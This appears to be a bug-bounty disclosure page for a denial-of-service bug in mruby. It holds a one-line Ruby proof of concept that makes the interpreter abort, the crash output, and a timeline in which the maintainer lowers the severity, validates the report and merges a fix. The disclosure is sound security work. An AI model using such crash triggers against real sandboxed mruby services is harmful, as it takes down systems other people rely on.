Denial of service in mruby/mruby

Valid

Reported on

May 4th 2022


Affected commit

49b8cef31f01c0d88d874e17714dff1fa5b85df0

Proof of Concept

raise SystemStackError.new BasicObject.new

Expected:

Raise exception without abort the software

Case output:

root:~/mruby/mruby/bin# ./mruby poc.rb 
poc.rb:1: can't convert BasicObject into String (TypeError)
Aborted

Test Platform:

Ubuntu 18.04

Acknowledgements

This bug was found by Ken Wong(@wwkenwong) from Black Bauhinia(@blackb6a) and Alex Cheung

Impact

Denial of service

Occurrences

We are processing your report and will contact the mruby team within 24 hours. 24 days ago
We have contacted a member of the mruby team and are waiting to hear back 23 days ago
Yukihiro "Matz" Matsumoto modified the Severity from Critical to Low 22 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Yukihiro "Matz" Matsumoto validated this vulnerability 22 days ago

This is a bug, but to use it as a security vulnerability, it requires: (a) use libmruby to sandbox untrusted input (e.g. mruby-engine) (b)enable MRB_USE_STDIO which is fundamentally more dangerous for untrusted input

Considering those requirements, I mark this as low

wwkenwong has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 457abf 22 days ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
error.c#L204 has been validated
to join this conversation